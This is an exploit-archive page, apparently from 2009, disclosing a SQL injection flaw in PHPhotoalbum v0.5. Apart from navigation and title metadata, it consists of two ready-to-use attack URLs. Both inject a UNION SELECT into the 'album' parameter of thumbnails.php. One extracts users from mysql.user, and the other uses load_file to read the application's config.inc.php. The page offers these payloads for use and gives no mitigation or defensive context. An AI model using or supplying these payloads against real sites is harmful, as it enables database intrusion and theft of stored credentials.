[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PHPhotoalbum v0.5 SQL Injection Vulnerability
# Published : 2009-12-21
# Author : Stack
# Previous Title : PDQ Script 1.0 <== [listingid] SQL Injection
# Next Title : Joomla Component com_mediaslide Directory Traversal Vulnerability


# Title: PHPhotoalbum Remote sql injection Vulnerability
# Tested on: windows

http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+user+from+mysql.user--



http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+load_file(/directory hex/config.inc.php)+from+mysql.user--